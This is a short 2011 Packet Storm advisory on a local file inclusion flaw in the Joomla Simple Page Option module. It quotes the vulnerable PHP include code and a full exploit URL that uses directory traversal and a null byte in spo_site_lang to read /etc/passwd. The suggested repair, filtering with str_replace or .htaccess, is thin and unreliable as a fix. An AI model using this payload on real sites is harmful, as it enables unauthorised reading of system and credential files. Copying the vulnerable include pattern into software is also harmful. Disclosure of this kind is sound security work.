Joomla Simple Page Option Local File Inclusion

2011-07-21T00:00:00
ID PACKETSTORM:103221
Type packetstorm
Reporter Camilo Galdos
Modified 2011-07-21T00:00:00

Description

                                        
                                            `Simple Page Option – LFI  
  
Vulnerable-Code:  
  
$s_lang =& JRequest::getVar('spo_site_lang'); (file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')) ? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php') : include(dirname(__FILE__).DS.'languages'.DS.'english.php');  
  
  
Vulnerable-Var:  
  
spo_site_lang=  
  
  
Expl0iting:  
  
http://www.xxx.com/home/modules/mod_spo/email_sender.php? also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_messa ge=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using %20Simple%20Page%20Options%20Module%20from %20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../e tc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se  
  
  
Reparing?:  
  
Just Filter with str_replace(); or htaccess protection to the vulnerable file.  
  
  
gr33tz:  
  
Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Perú Security.  
`